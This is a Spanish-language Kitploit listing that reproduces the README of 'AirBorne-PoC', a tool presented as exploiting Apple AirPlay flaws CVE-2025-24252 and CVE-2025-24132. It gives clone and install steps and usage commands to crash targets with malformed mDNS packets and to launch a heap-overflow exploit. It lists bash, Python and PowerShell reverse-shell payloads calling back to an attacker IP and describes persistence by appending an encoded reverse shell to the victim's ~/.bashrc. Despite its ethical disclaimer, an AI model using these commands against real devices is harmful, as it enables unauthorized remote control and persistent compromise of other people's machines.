Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
AirBorne-PoC — PoC para CVE-2025-24252 y CVE-2025-24132 | Kitploit
Herramientas/GitHubGitHub/ekomssavior/airborne-poc
Mecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónShellcodePost-ExplotaciónComando y ControlHerramienta de Acceso RemotoDesarrollo de PayloadsExplotación de Binarios
GitHubekomssavior/airborne-poc

AirBorne-PoC

PoC para CVE-2025-24252 y CVE-2025-24132

16427hace 7 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

AirBorne PoC Framework – Edición Elite RCE

Framework PoC completo para CVE-2025-24252 y CVE-2025-24132
Por ekomsSavior |

AirBorne es un framework combinado de prueba de concepto (PoC) que apunta a dos vulnerabilidades graves en el servicio AirPlay de Apple. Incluye un desencadenador de caída completo y un exploit de shell inversa funcional con persistencia opcional, listener y múltiples formatos de payload, todo en un solo script.

¿Buscas la versión original?
La edición heredada sigue disponible en la rama legacy de este repositorio.
Para revisarla:

root@kitploit:~
git checkout legacy

CVEs Cubiertos

CVE-2025-24252 – Caída por registro TXT de mDNS

  • Desencadena una caída en el daemon de AirPlayReceiver mediante un paquete mDNS malformado.
  • Funciona mediante difusión UDP en el puerto 5353.

CVE-2025-24132 – Desbordamiento de montículo → Shell inversa (RCE)

  • Desencadena un desbordamiento de montículo en el servicio TCP de AirPlay en el puerto 7000.
  • Compatible con payloads de shell inversa en bash, python y PowerShell.
  • Incluye persistencia opcional mediante inyección en .bashrc (Linux).

Primeros Pasos

1. Clonar el Repositorio

root@kitploit:~
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC

2. Instalar Dependencias

root@kitploit:~
sudo apt update
sudo apt install -y python3-scapy netcat

Recorrido de Ejecución

El único script airborne.py incluye ambos PoCs y toda la lógica:

  • Selecciona un CVE usando --exploit
  • Configura un payload de shell inversa usando --payload
  • Inicia automáticamente un listener de netcat por ti
  • Habilita opcionalmente la persistencia en el objetivo usando --persistent

Ejemplos de Uso

Provocar Caída del Objetivo con Paquete mDNS (CVE-2025-24252)

root@kitploit:~
sudo python3 airborne.py --exploit 24252 --interface wlan0

Requiere una interfaz en modo monitor.


Lanzar Desbordamiento de Montículo → RCE (CVE-2025-24132)

Iniciar el exploit completo con shell bash predeterminada:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99

Elegir shell de Python en su lugar:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python

Habilitar persistencia real en objetivos Linux:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent

Solo inyección de comandos de shell

root@kitploit:~
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"

Opciones de Payload

PayloadDescripción
bashShell inversa bash predeterminada sobre TCP
pythonShell inversa basada en Python usando socket y pty

Modo de Persistencia

Al usar --persistent, el script añadirá el payload de shell inversa codificado al archivo del objetivo:

root@kitploit:~
~/.bashrc

Esto garantiza que recibirás una shell cada vez que el usuario inicie sesión o se abra una terminal.


Notas de Mantenimiento

  • Las shells inversas se codifican usando base64 y se entregan tras el desbordamiento de búfer
  • Todos los payloads se envían a través del puerto 7000
  • Los paquetes mDNS viajan por UDP 5353 y requieren permisos de socket sin procesar
  • Asegúrate de que la IP de tu equipo de ataque sea alcanzable por el dispositivo objetivo
  • El script maneja casos de error básicos y falla silenciosamente si los puertos están cerrados

Aviso Ético

Este proyecto está destinado únicamente a investigación educativa, ética y autorizada.

  • Debes tener permiso explícito para probar el sistema objetivo.
  • Asumes toda la responsabilidad por cualquier acción realizada.

La explotación no autorizada de sistemas es ilegal y poco ética.


Créditos

  • Creado por ekomsSavior
  • Inspirado en CVEs reales e investigación de desarrollo de exploits
Descargar herramienta
powershell
Payload RCE completo de Windows PowerShell (ofuscado)